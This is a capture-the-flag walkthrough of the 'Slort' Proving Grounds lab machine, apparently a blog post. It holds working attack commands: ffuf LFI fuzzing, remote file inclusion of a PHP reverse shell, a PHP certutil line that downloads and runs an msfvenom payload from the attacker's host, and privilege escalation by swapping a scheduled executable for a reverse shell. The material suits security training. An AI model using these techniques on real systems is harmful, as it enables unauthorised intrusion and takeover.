Post

Slort - PG

Recon & Enumeration

  • nmap -Pn -p- -A 192.168.174.53
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, NULL, TerminalServerCookie, WMSRequest, X11Probe: 
|_    Host '192.168.49.174' is not allowed to connect to this MariaDB server
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.174.53:4443/dashboard/
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.174.53:8080/dashboard/
49664/tcp open  unknown
49665/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=12/20%Time=5FDF606F%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.49\.78'\x20is\x20not\x20al
<-SNIP->
SF:r")%r(WMSRequest,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.49\.68'\x20is
SF:\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server"
SF:);
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-12-20T14:32:43
|_  start_date: N/A

GoBuster

1
2
3
4
5
6
7
8
9
10
11
12
13
gobuster dir -u http://192.168.174.53:4443/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50

/img        (Status: 301) [Size: 345] [--> http://192.168.174.53:4443/img/]
/site       (Status: 301) [Size: 346] [--> http://192.168.174.53:4443/site/]
/dashboard  (Status: 301) [Size: 351] [--> http://192.168.174.53:4443/dashboard/]

=====================================================

gobuster dir -u http://192.168.174.53:8080/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50

/img        (Status: 301) [Size: 345] [--> http://192.168.174.53:8080/img/]
/site       (Status: 301) [Size: 346] [--> http://192.168.174.53:8080/site/]
/dashboard  (Status: 301) [Size: 351] [--> http://192.168.174.53:8080/dashboard/]
  • I actually got the same results on both ports and the content is exactly the same. Not really sure if one is proxy or something
  • If you visit http://192.168.174.53:4443/site/, it redirects to http://192.168.174.53:4443/site/index.php?page=main.php
  • If you visit http://192.168.174.53:8080/site/, it redirects to http://192.168.174.53:8080/site/index.php?page=main.php

Exploitation

LFI RFI

  • If you haven’t noticed it already, there is a vulnerable looking parameter there: index.php?page=main.php so we will have to test it for LFI and RFI

http://192.168.174.53:4443/site/index.php?page=main.php

1
2
3
4
5
6
ffuf -u 'http://192.168.174.53:4443/site/index.php?page=FUZZ' -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -c -t 50 -fw 34 | grep -v '*passwd* \| *passwd%00 \| *shadow%00'

ffuf -u 'http://192.168.174.53:4443/site/index.php?page=FUZZ' -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -c -t 50 -fw 34

C:/Users/Administrator/NTUser.dat [Status: 200, Size: 372, Words: 31, Lines: 5]
C:/WINDOWS/System32/drivers/etc/hosts [Status: 200, Size: 824, Words: 172, Lines: 22]

PHP Info Page phpinfo.php

  • http://192.168.174.53:4443/site/index.php?page=../dashboard/phpinfo.php
  • http://192.168.174.53:8080/site/index.php?page=../dashboard/phpinfo.php

Other Could-Be-Important Findings

  • C:\xampp\php\logs\php_error_log

  • Then I tested for RFI with a text file and simple HTTP Python server and was able to confirm RFI

Reverse Shell with RFI Remote File Inclusion

  • PHP Windows Shell
  • Add IP and Port
  • It did not work with default directory so I got the directory from phpinfo.php file from our LFI earlier and then I got a reverse shell as user rupert
1
2
3
4
$ip   = "192.168.49.174";
$port = "445";
// $tmpdir = "C:\\windows\\temp";
$tmpdir = "C:\\xampp\\apache";
  • python3 -m http.server
  • nc -lvnp 445
1
http://192.168.174.53:8080/site/index.php?page=http://192.168.49.174/winshell.php
  • whoami => rupert

Another Method

  • msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.174 LPORT=135 -f exe -o shell.exe

  • cat pwn.php

1
2
3
<?php
$exec = system('certutil.exe -urlcache -split -f "http://192.168.49.174/shell.exe" shell.exe', $val);
?>
1
curl http://192.168.174.53:8080/site/index.php?page=http://192.168.49.174/pwn.php
  • Then to execute the shell.exe file we transferred onto the target, edit it like below and send a curl request again or just visit that link in the browser
  • cat pwn.php
1
2
3
<?php
$exec = system('shell.exe', $val);
?>

Privilege Escalation

  • Backup directory in C:\ looks interesting
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
> cd C:\Backup
> dir

01/02/2022  05:09 PM    <DIR>          .
01/02/2022  05:09 PM    <DIR>          ..
06/12/2020  06:45 AM            11,304 backup.txt
06/12/2020  06:45 AM                73 info.txt
01/02/2022  04:41 PM             7,168 TFTP.EXE
06/23/2020  06:49 PM            73,802 TFTP.EXE.BAK
               4 File(s)         92,347 bytes
               2 Dir(s)  27,226,210,304 bytes free

> type info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt
  • It is automatically running every 5 minutes so we can try replacing it with our reverse shell. Check access and details with accesschk or sc qc
  • msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.174 LPORT=135 -f exe -o shell.exe
  • move TFTP.EXE TFTP.EXE.BAK - always take a backup of the original file
  • copy C:\Users\rupert\shell.exe TFTP.EXE
  • nc -lvnp 135
  • whoami => slort\administrator
1
2
3
4
5
whoami && hostname && ipconfig | findstr IPv4 && type proof.txt
slort\administrator
slort
   IPv4 Address. . . . . . . . . . . : 192.168.174.53
39947eae21088415f145c9c626f9fa
This post is licensed under CC BY 4.0 by the author.